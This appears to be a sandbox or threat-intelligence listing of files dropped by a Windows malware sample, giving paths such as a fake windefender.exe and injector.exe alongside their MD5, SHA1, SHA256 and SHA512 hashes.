SHA512 1feda87340545edc45b9a5c1a1eade79f2cff2044dede6358facfc74b811d574abece5962655dcd909472190bd90a4247519c74542b086e85faafcd70b0312d5

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 e808d6a69b8499dcb5b789ca516b5e10
SHA1 b4f3f350552578169c8f72ec8662104f6f98d58e
SHA256 23e7333a37381a96709a2691ef61c88fb74eb5f33753efd46cefd099c7172f5b
SHA512 8b858275b8326f575377a2b4407e8521450c2247dfc8951c3288255f4391374ab0a2001aab6d4e57c403353b04fde5bab1359a0e2ce2a6d4a2a8c37db1aee125

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 ba2b24184850e288fa62f8a3bc5fc523
SHA1 3ff977e1c25e0095fad9d4ea194e56151c793483
SHA256 2cae7fd256ae3088d4efb1c7f3d721f9962938e89823815a66f3202969097ff1
SHA512 b015c6a9bbaf10b307fd7b00b61bc257ffd4f82241184abcc96062da178dc61740fb97d42ad15c61ecc1a56511a28afb24bdad3704203a8470ecf496af8b1f49

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 7c3bdd849e4f8a2070e78062bb1548eb
SHA1 53b8151fc5403b5c285ae8a68254a733fadc1ef6
SHA256 6eb8564491e2603067269bfc6fd63e242536faf5bd989e310528bbbcc0ee2633
SHA512 ff08b261629fd8a2a03273679ac6ca367f128e8ba8a9144fdc77df4eec156ae98861b44c3ab95a8e250f06b5f07edf27affe4e2a17d1065fc039cc20e5e9309e

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

C:\Windows\windefender.exe

MD5 8e67f58837092385dcf01e8a2b4f5783
SHA1 012c49cfd8c5d06795a6f67ea2baf2a082cf8625
SHA256 166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa
SHA512 40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec

C:\Windows\System32\drivers\etc\hosts

MD5 2d29fd3ae57f422e2b2121141dc82253
SHA1 c2464c857779c0ab4f5e766f5028fcc651a6c6b7
SHA256 80a60d7ec533d820de20bcedeb41319e7b1def548b6ea73ddbd69455bac4e7a4
SHA512 077a5c554663be7b71f181d961f5c98c732bc296dc015ffee30768a648bee3aad62c39c352cf2947432be19519906aeac7dfaf2557d309bb460732abb7fdbc68

C:\Windows\windefender.exe

MD5 8e67f58837092385dcf01e8a2b4f5783
SHA1 012c49cfd8c5d06795a6f67ea2baf2a082cf8625
SHA256 166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa
SHA512 40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec

C:\Windows\TEMP\kyabiylzsfjo.xml

MD5 546d67a48ff2bf7682cea9fac07b942e
SHA1 a2cb3a9a97fd935b5e62d4c29b3e2c5ab7d5fc90
SHA256 eff7edc19e6c430aaeca7ea8a77251c74d1e9abb79b183a9ee1f58c2934b4b6a
SHA512 10d90edf31c0955bcec52219d854952fd38768bd97e8e50d32a1237bccaf1a5eb9f824da0f81a7812e0ce62c0464168dd0201d1c0eb61b9fe253fe7c89de05fe

C:\Program Files\Google\Chrome\updater.exe

MD5 38b644718080f19e7d636b8d3709c88a
SHA1 f6a4e61b4b3cef215cb550329d9ff9d8f21742e3
SHA256 70c8aa98511897e762d7764916b51afc1e6c8b4e418479c393ef546bdfc23328
SHA512 1feda87340545edc45b9a5c1a1eade79f2cff2044dede6358facfc74b811d574abece5962655dcd909472190bd90a4247519c74542b086e85faafcd70b0312d5

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

MD5 55f845c433e637594aaf872e41fda207
SHA1 1188348ca7e52f075e7d1d0031918c2cea93362e
SHA256 f9f9b154f928549c7a4b484909f41352048ce8148c678f4ec32c807c1d173a39
SHA512 5a9b5e83b41041259060e3a29163cdd5ed271c5d476fa455b40ec9bc32bf4bcddaf3aa1ba23faacc2669be420acb905677ec4fcfb3d69e7b9f7908ae5cbd18a4